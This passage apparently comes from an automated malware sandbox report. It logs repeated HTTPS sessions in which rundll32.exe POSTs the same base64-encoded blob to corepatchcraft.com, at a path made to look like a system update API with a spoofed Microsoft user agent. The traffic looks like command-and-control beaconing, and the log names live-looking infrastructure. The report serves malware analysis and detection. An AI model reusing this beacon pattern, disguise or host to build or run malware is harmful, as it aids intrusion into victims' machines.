                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:31 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.66427994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:32 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:32 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:32 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:32 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:32 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.66429094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:33 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:33 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:33 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:33 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:33 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.66429994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:34 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:34 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:35 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:35 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:35 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.66431194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:36 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:36 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:36 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:36 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:36 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.66432194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:37 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:37 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:37 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:37 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:37 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.66433194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:38 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:38 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:39 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:39 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:39 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.66434094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:40 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:40 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:40 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:40 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:40 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.66435094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:41 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:41 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:41 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:41 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:41 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.66436094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:42 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:42 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:43 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:43 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:43 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.66437194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:44 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:44 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:44 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:44 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:44 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.66438294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:45 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:45 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:46 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:45 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
